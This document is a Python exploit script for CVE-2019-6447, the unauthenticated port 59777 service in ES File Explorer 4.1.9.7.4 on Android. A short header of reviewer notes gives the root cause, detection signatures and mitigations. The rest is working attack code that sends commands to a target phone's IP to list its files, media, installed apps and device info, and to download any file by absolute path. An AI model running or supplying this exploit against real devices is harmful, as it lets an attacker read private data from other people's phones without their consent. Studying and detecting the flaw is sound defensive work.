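# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447
#
# Reviewer notes (what this script shows about the flaw):
#   * The affected app exposes an HTTP service on TCP port 59777. Every
#     request below is sent without credentials, a session or a token, so
#     the root cause is a network-reachable service with no authentication.
#   * Two request shapes are used: a POST whose JSON body is
#     {"command": "<name>"} and a GET of an absolute filesystem path.
#     Both are distinctive enough to match on in proxy, IDS or flow logs.
#   * Detection: connections to TCP/59777 on handsets, and POSTs with
#     Content-Type application/json carrying one of the command names below.
#   * Mitigation: remove or update the affected app version, and keep
#     TCP/59777 unreachable from untrusted network segments.

import ast
import json
import sys

import requests

# Without a timeout, requests waits indefinitely on an unresponsive host.
REQUEST_TIMEOUT = 10

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]

cmds = [
    'listFiles',
    'listPics',
    'listVideos',
    'listAudios',
    'listApps',
    'listAppsSystem',
    'listAppsPhone',
    'listAppsSdcard',
    'listAppsAll',
    'getFile',
    'getDeviceInfo',
]
# The first nine commands all return a list of records.
listCmds = cmds[:9]

if cmd not in cmds:
    for line in (
        "[-] WRONG COMMAND!",
        "Available commands : ",
        "listFiles : List all Files.",
        "listPics: List all Pictures.",
        "listVideos: List all videos.",
        "listAudios: List all audios.",
        "listApps: List Applications installed.",
        "listAppsSystem: List System apps.",
        "listAppsPhone : List Communication related apps.",
        "listAppsSdcard: List apps on the SDCard.",
        "listAppsAll : List all Application.",
        "getFile : Download a file.",
        "getDeviceInfo : Get device info.",
    ):
        print(line)
    sys.exit(1)

print("\n==================================================================")
print("|ES File Explorer Open Port Vulnerability : CVE-2019-6447|")
print("|Coded By : Nehal a.k.a PwnerSec |")
print("==================================================================\n")

header = {"Content-Type": "application/json"}


def httpPost(cmd):
    """POST a JSON command to the service and return the parsed reply.

    The reply body is parsed with ast.literal_eval, which only accepts Python
    literals, so remote text is never executed as code. It raises ValueError
    or SyntaxError when the body is not a literal (for example an error page).
    Raises requests.RequestException on transport errors or a non-2xx status.
    """
    data = json.dumps({"command": cmd})
    response = requests.post(
        url, headers=header, data=data, timeout=REQUEST_TIMEOUT
    )
    # Do not try to parse an error page as if it were a result.
    response.raise_for_status()
    return ast.literal_eval(response.text)


def parse(text, keys):
    """Print the selected keys of every record in text, one record per group.

    A key that a record does not carry is skipped for that record instead of
    raising KeyError; the caller takes keys from the first record only.
    """
    for dic in text:
        for key in keys:
            if key in dic:
                print(f"{key} : {dic[key]}")
        print('')


def do_listing(cmd):
    """Run one of the list commands and print each returned record."""
    response = httpPost(cmd)
    keys = list(response[0].keys()) if response else []
    parse(response, keys)


try:
    if cmd in listCmds:
        do_listing(cmd)

    elif cmd == cmds[9]:
        if len(sys.argv) != 4:
            print("[+] Include file name to download.")
            sys.exit(1)
        # startswith() also rejects an empty argument, where indexing [0]
        # would raise IndexError.
        elif not sys.argv[3].startswith('/'):
            print("[-] You need to provide full path of the file.")
            sys.exit(1)
        else:
            path = sys.argv[3]
            print("[+] Downloading file...")
            response = requests.get(url + path, timeout=REQUEST_TIMEOUT)
            # Only write out.dat for a successful reply; otherwise an error
            # body would be saved and reported as the requested file.
            response.raise_for_status()
            # out.dat is overwritten on every run and holds untrusted bytes.
            with open('out.dat', 'wb') as wf:
                wf.write(response.content)
            print("[+] Done. Saved as `out.dat`.")

    elif cmd == cmds[10]:
        response = httpPost(cmd)
        for key, value in response.items():
            print(f"{key} : {value}")

except requests.RequestException as exc:
    print(f"[-] Request failed: {exc}")
    sys.exit(1)
except (ValueError, SyntaxError) as exc:
    print(f"[-] Unexpected response format: {exc}")
    sys.exit(1)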